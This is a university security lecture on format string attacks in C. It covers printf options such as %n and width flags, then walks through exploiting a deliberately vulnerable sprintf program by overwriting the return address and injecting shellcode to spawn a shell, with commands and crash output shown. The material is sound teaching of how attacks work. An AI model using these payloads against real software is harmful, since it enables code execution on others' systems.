Lec. 19: Format String Attacks 1
Table of Contents
1 Format String Attacks
A format string attack is an alternate form of exploiting programming that doesn't necessarily require smashing the stack. Instead, it leverages the format characters in a format string to generate excessive data, read from arbitrary memory, or write to arbitrary memory.
At the heart of a format string attack is a casual programming error regarding format strings that allows the user to provide the format string portion, not just the arguments to the format. For example:
#include <stdio.h> #include <stdlib.h> int main(int argc, char * argv[]){ printf(argv[1]); // user controls the format printf("\n"); }
In this program, the user provides the format portion of the
printf()
. When we run this, for most of the common things, it
doesn't matter:
user@si485H-base:demo$ ./format_error "Hello World" Hello World user@si485H-base:demo$ ./format_error "Go Navy" Go Navy user@si485H-base:demo$ ./format_error "%x" b7fff000
However, notice what happens when you give a format character, i.e., one that starts with a '%.' The format character is interpreted and the output is an address, an address on the stack, more precisely. What if I were to give it something longer? What if we were to give it something that would cause a memory address to be dereferenced, like a '%s' :
user@si485H-base:demo$ ./format_error "%s.%s.%s.%s.%s.%s.%s" 4.??u?.UW1?VS???????unull).(null).?$?U? user@si485H-base:demo$ ./format_error "%s.%s.%s.%s.%s.%s.%s.%s" Segmentation fault (core dumped)
We can actually get the program to crash, and from we've seen so far, getting the program to crash is usually the first step towards exploiting the program, which is what we'll eventually do.
2 Uncommon Formats and Format Options
In order to full leverage the power of the format, we need to review
the full list of formats and format options. You should refer to the
manual page for all the details man 3 printf
.
2.1 %n : Saving the Number of Bytes
Format printing services allows you to save the total bytes formatted into a variable. There is a decent chance you've never heard of this format, but it actually is surprisingly useful for certain tasks. For example, given a format and its arugments, it is not obvious how to determine how long the output is until it actually formatted.
Here's a basic example, of using %n
:
#include <stdio.h> #include <stdlib.h> int main(int argc, char *argv){ int count_one, count_two; printf("The number of bytes written up to this point X%n is being stored in count_one, " "and the number of bytes up to here X%n is being stored in count_two.\n", &count_one,&count_two); printf("count_one: %d\n", count_one); printf("count_two: %d\n", count_two); return 0; }
The %n
format matches to an address, in paticular an address of an
integer, at which the number of bytes formatted up to that point are
stored. So, for example, running this program, we get:
user@si485H-base:demo$ ./format_n The number of bytes written up to this point X is being stored in count_one, and the number of bytes up to here X is being stored in count_two. count_one: 46 count_two: 113
Note that the %n
character is not actually produced in the output:
it is not printable. Instead, it only has a side effect.
Ok, so why does this format exist? Well, there are some really
practical uses, for example, consider counting the digits of a number
read in using scanf()
:
user@si485H-base:demo$ cat scanf_n.c #include <stdio.h> #include <stdio.h> int main(int argc, char * argv[]){ int a,n; scanf("%d%n",&a,&n); printf("Number: %d Digits: %d\n",a,n); }
user@si485H-base:demo$ ./scanf_n 1234567890 Number: 1234567890 Digits: 10
Or for example, to do text align … there are a lot of reasonable reasons to have this format.
2.2 Format Flag and Argument Options
Another tool of formats we will need is some of the extra options for formats to better manipulate the format output. So far you are fairly familiar with the conversion formats:
%d
: signed number%u
: unsigned number%x
: hexadecimal number%f
: floating point number%s
: string conversion
What you might not be aware is there is a wealth more options to change the formatting. Here's a sample program that will illuminate some of these, so called "flag" options:
#include <stdio.h> #include <stdlib.h> int main(int argc, char * argv[]){ int x = 0xdeadbeef; printf("%%d:(%d)\n",x); printf("%%u:(%u)\n",x); printf("%%x:(%x)\n",x); printf("%%#x:(%#x)\n",x); printf("%%#50x:(%#50x)\n",x); printf("%%#050x:(%#050x)\n",x); printf("%%1$#050x %%1$d:(%1$#050x %1$d)\n",x); printf("%%#050x:(%#050x)\n",x); printf("%%1$#050x %%1$d:(%1$#050x %1$d)\n",x); }
user@si485H-base:demo$ ./unusual_formats %d:(-559038737) %u:(3735928559) %x:(deadbeef) %#x:(0xdeadbeef) %#50x:( 0xdeadbeef) %#050x:(0x0000000000000000000000000000000000000000deadbeef) %1$#050x %1$d:(0x0000000000000000000000000000000000000000deadbeef -559038737) %1$#050hx %1$hd:(0x00000000000000000000000000000000000000000000beef -16657) %1$#050hhx %1$hd:(0x0000000000000000000000000000000000000000000000ef -17)
The first flag option is the "#" which is used to add prefix formatting. In the case of printing in hexadecimal it will add '0x' to the start of non-zero values. That's pretty useful.
The next option is adding a number prior to the conversion argument,
as in %#50x
. This conversion will right adjust the format such
that the entirety of the number takes up 50 hex digits. If you were to
add a leading 0 to the adjustment, as in %#050x
, the format will
fill those blank spaces with 0's.
Perhaps the least familiar option you've seen is the m$
format where
m
is some number, allows you to refer to a specific argument being
passed. In the example above, we refer to the same argument twice
using two different conversion formats to follow. This is really
useful to not have to pass the same argument multiple times; however,
when you use the $
references, you have to do for all the format
arguments.
Finally, we have the half-conversion option h
which says to only
convert half the typical size. In this case, since we are working with
4-byte integer values, that would mean to format a 2-byte short size
value when using one h
, or a single char length 1-byte value with
two, hh
.
2.3 Flag Options for Strings
With strings, things are similar but a bit different. Here's some example code:
#include <stdio.h> #include <stdlib.h> int main(int argc, char * argv[]){ char * string = "Go Navy! Beat Army!"; printf("%%s:(%s)\n",string); printf("%%50s:(%50s)\n",string); printf("%%.5s:(%.5s)\n",string); printf("%%50.5s:(%50.5s)\n",string); printf("%%-50.5s:(%-50.5s)\n",string); }
user@si485H-base:demo$ ./string_formats %s:(Go Navy! Beat Army!) %50s:( Go Navy! Beat Army!) %.5s:(Go Na) %50.5s:( Go Na) %-50.5s:(Go Na )
Like with numbers, we can specify a length flag to right adjust the string up to some specified size, but we can't fill in that with 0's. Instead the space is filled with spaces.
Unlike with integer numbers (but can be done with float numbers) we
can also truncate the length of the format if we use the .
option. The number following the .
says how many bytes from the
string should be used, and this can be combined with the right
adjustment. And, interestingly, the right adjustment can be flipped to
left adjustment with a negative sign.
While this is all on the output side and you can imagine where it might be super useful, from a security perspective of overflow protection, the right adjustment becomes a limiter to how many bytes can be written to the target address:
#include <stdio.h> #include <stdlib.h> int main(int argc, char * argv[]){ char string[10]; scanf("%10s",string); printf("%s\n",string); }
user@si485H-base:demo$ ./scanf_format HELLLOOOOOOOOOOOOOOO HELLLOOOOO
3 Using formats in an exploit
Now that we've had a whirl-wind tour of formats you've never heard of nor ever really wanted to use, how can we use them in an exploit. We'll look at one method in this lesson involving stack smashing, but we'll see some other techniques soon.
Here's the program we are going to exploit:
#include <stdio.h> #include <stdlib.h> #include <string.h> void good(){ printf("good\n"); } void bad(){ printf("bad\n"); } void vuln(char * str){ char outbuf[512]; char buffer[512]; sprintf (buffer, "ERR Wrong command: %.400s", str); sprintf (outbuf, buffer); //<--- used as a silly copy printf("outbuf: %s\n", outbuf); } int main(int argc, char *argv[]){ vuln(argv[1]); }
This is a rather contrived example of using sprintf()
to do a
copy. You might think because in the first sprintf()
the %.400s
format is used, this would not enable a overflow of buffer
or
outbuff
. For example, this does not cause a segmentation fault:
user@si485H-base:demo$ ./format_overflow `python -c "print 'A'*1000"` outbuf: ERR Wrong command: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
True, we can't overflow buffer
, but we can overflow outbuff
because buffer
is treated as the format character. For example, what
if the input was like:
user@si485H-base:demo$ ./format_overflow "%550x" outbuf: ERR Wrong command: bffff897 Segmentation fault (core dumped)
And if we look at the dmesg
output:
user@si485H-base:demo$ dmesg | tail -1 [181031.140058] format_overflow[16736]: segfault at 20202020 ip 20202020 sp bffff6b0 error 14
We see that we overwrote the instruction pointer with a bunch of 0x20
bytes, or spaces! Now, the goal is to overwrite the return address
with something useful, like the address of bad()
.
user@si485H-base:demo$ objdump -d format_overflow | grep bad 08048481 <bad>:
To do this, we need to do the right number of extended format to hit
the return address, We can do this by first using 0xdeadbeef and
checking the dmesg
output:
user@si485H-base:demo$ ./format_overflow "%500d$(printf '\xef\xbe\xad\xde')" > /dev/null ; dmesg | tail -1 Segmentation fault (core dumped) [181507.663004] format_overflow[16817]: segfault at deadbe ip 08048504 sp bffff6b0 error 4 in format_overflow[8048000+1000] user@si485H-base:demo$ ./format_overflow "%501d$(printf '\xef\xbe\xad\xde')" > /dev/null ; dmesg | tail -1 Illegal instruction (core dumped) [181507.663004] format_overflow[16817]: segfault at deadbe ip 08048504 sp bffff6b0 error 4 in format_overflow[8048000+1000] user@si485H-base:demo$ ./format_overflow "%502d$(printf '\xef\xbe\xad\xde')" > /dev/null ; dmesg | tail -1 Segmentation fault (core dumped) [181516.038682] format_overflow[16827]: segfault at 80400de ip 080400de sp bffff6b0 error 14 in format_overflow[8048000+1000] user@si485H-base:demo$ ./format_overflow "%503d$(printf '\xef\xbe\xad\xde')" > /dev/null ; dmesg | tail -1 Segmentation fault (core dumped) [181519.371290] format_overflow[16832]: segfault at 800dead ip 0800dead sp bffff6b0 error 14 in format_overflow[8048000+1000] user@si485H-base:demo$ ./format_overflow "%504d$(printf '\xef\xbe\xad\xde')" > /dev/null ; dmesg | tail -1 Segmentation fault (core dumped) [181522.598268] format_overflow[16837]: segfault at deadbe ip 00deadbe sp bffff6b0 error 14 in format_overflow[8048000+1000] user@si485H-base:demo$ ./format_overflow "%505d$(printf '\xef\xbe\xad\xde')" > /dev/null ; dmesg | tail -1 Segmentation fault (core dumped) [181526.367333] format_overflow[16842]: segfault at deadbeef ip deadbeef sp bffff6b0 error 15
So if we use a 505 byte length %d format, the next 4-bytes we write is the return address. And adding that, we get what we want:
user@si485H-base:demo$ objdump -d format_overflow | grep bad 08048481 <bad>: user@si485H-base:demo$ ./format_overflow "%505d$(printf '\x81\x84\x04\x08')" outbuf: ERR Wrong command: -1073743725?? bad Segmentation fault (core dumped)
We can also get this to execute a shell in the normal way (note how I adjusted the jump point using dmesg).
user@si485H-base:demo$ ./format_overflow "%505d$(printf '\xef\xbe\xad\xde')$(printf $(./hexify.sh smallest_shell))" outbuf: ERR Wrong command: -1073743746ᆳ?1???Phn/shh//bi?? ̀ Segmentation fault (core dumped) user@si485H-base:demo$ dmesg | tail -1 [181798.445440] format_overflow[16919]: segfault at deadbeef ip deadbeef sp bffff690 error 15 user@si485H-base:demo$ ./format_overflow "%505d$(printf '\x90\xf6\xff\xbf')$(printf $(./hexify.sh smallest_shell))" outbuf: ERR Wrong command: -1073743746????1???Phn/shh//bi?? ̀ $ echo "I did it!" I did it! $